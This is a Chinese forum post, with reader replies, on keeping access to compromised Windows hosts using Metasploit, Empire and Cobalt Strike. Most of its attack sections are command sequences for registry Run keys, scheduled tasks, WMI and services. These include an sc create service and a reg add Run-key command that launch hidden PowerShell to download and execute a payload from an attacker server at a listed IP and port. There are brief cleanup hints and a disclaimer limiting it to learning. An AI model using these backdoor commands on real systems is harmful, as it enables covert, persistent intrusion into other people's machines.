【大白分享】渗透安全之渗透测试框架权限维持篇

大家好，我是大白，如果你的生活已处于低谷，那就，大胆走，因为你怎样走都是在向上。依旧感谢各位小伙伴的一路支持与陪伴！！！！

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取！！！！

今天分享大白的渗透安全之Windows命令文件传输方式篇，同样还是对于好多小伙伴来说，这个更加偏向于安服，总体来说确实更加偏向于安服但是对于安全知识的了解以及更加层次的学习甚至使用都比较重要，我们可以一同研习一下渗透攻防的“魅力”。

在渗透安全的圈内，权限维持可是一个经久不衰的话题，也是各大安全厂商苦于钻研的根本，本次就讲一下三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。

MSF权限维持

使用MSF维持权限的前提是先获得一个meterpreter shell，通过meterpreter shell获取持久性shell的方法有两种：

Persistence模块

通过启动项启动(persistence)的方式，在目标机器上以反弹回连。

1. -U：设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数；
   
2. -X：设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题，会导致添加失败，后门将无法启动。
   
3. -S：作为服务自动启动代理程序（具有SYSTEM权限）

复制代码

生成的相关文件位置 ：

1. # 后门文件位置：
   
2. C:\Windows\Temp
   
3. C:\Users\Administrator\AppData\Local\Temp
   
4. # 注册表位置：
   
5. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
   
6. HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

复制代码

Metsvc 模块

通过服务(metsvc)启动的方式，在目标机器启动后自启动一个服务，等待连接。

后门排查：目标主机上开启了一个Meterpreter服务。

Empire 权限维持

Empire的persistence模块提供了18种权限维持的方法，大致可以分为四类，即

注册表

1. (Empire: agents) > agents
   
2. (Empire: agents) > interact URL3FZBV
   
3. (Empire: URL3FZBV) > usemodule persistence/elevated/registry*
   
4. (Empire: powershell/persistence/elevated/registry) > set Listener test
   
5. (Empire: powershell/persistence/elevated/registry) > execute

复制代码

因为是开机启动，所以会弹个黑框，之后还会弹出注册表添加的powershell启动项的框，在注册表位置如下：

计划任务

1. (Empire: agents) > interact 9NZ2RWBC
   
2. (Empire: 9NZ2RWBC) > usemodule persistence/elevated/schtasks*
   
3. (Empire: powershell/persistence/elevated/schtasks) > set Listener test
   
4. (Empire: powershell/persistence/elevated/schtasks) > set DailyTime 22:50
   
5. (Empire: powershell/persistence/elevated/schtasks) > execute

复制代码

在任务计划程序库可以看到-任务为Updater-启动程序如下可以到为powershell

wmi

1. (Empire: agents) > interact 9NZ2RWBC
   
2. (Empire: 9NZ2RWBC) > usemodule persistence/elevated/wmi
   
3. (Empire: powershell/persistence/elevated/wmi) > set Listener test
   
4. (Empire: powershell/persistence/elevated/wmi) > run

复制代码

如何清除后门，最简单的方法就是使用Autoruns，选择WMI选项卡，右键就可以删除恶意后门。

Cobalt Strike权限维持

通过Cobalt Strike拿到一个shell，留后门的方法有很多，下面介绍两种比较常见的无文件、自启动后门。

从Cobalt Strike菜单栏，Attacks--Web Drive-by--Scaripted Web Delivery，生成powershell后门。

根据需要可以自己选择，填写所需参数默认端口是80（需要注意的就是不要使用重复端口），Type选择powershell。

点击Launch后，返回powershell远程下载执行命令。

服务器自启动后门

1. sc create "Name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.28.142:8080/a'))\""
   
2. sc description  Name "Just For Test"   //设置服务的描述字符串
   
3. sc config Name start= auto             //设置这个服务为自动启动
   
4. net start Name                         //启动服务

复制代码

重启服务器后，成功返回一个shell。

注册表自启动

在windows启动项注册表里面添加一个木马程序路径，如：

1. beacon>getsystem
   
2. beacon>shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://IP地址:端口/a'))\"" /f

复制代码

账号注销后，重新登录，界面上会出现powershell快速闪过消失，成功返回shell。

注册表还有哪些键值可以设置为自启动：

1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
   
2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   
3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

复制代码

*本篇章将本着学习的态度进行分享，严禁用于个人非法行为以及黑产获取，网络不是法外之地！！！！

以上就是本次的渗透安全之Windows权限维持后门隐藏篇，一句忠告：业务备份一时不做一时爽，问题出现两行泪，感谢大佬们的参阅，此贴先到这里后续会带上更加实用的帖子，感谢大家！

励志分享超清壁纸语句~~：

与有肝胆人共事，从无字句处读书。——周恩来

好的今天就到这里，老样子，感谢各位大神的参阅，孩子为了挣豆子不容易，孩子家里穷没豆子吃饭了！！！

学习了，感谢朱工的分享。朱工威武！

谢谢楼主分享，学习了。。。。

楼主的文章图文并茂，清晰易懂，看完这波操作可以轻松上手了，如遇到问题再向楼主请教~

感谢楼主分享，努力学习中！！！！

感谢楼主的精彩分享，有助工作!!!

感谢楼主的精彩分享，有助工作!!!

学习到了，有助于工作！

感谢楼主分享，学习一下

感谢楼主分享，学习一下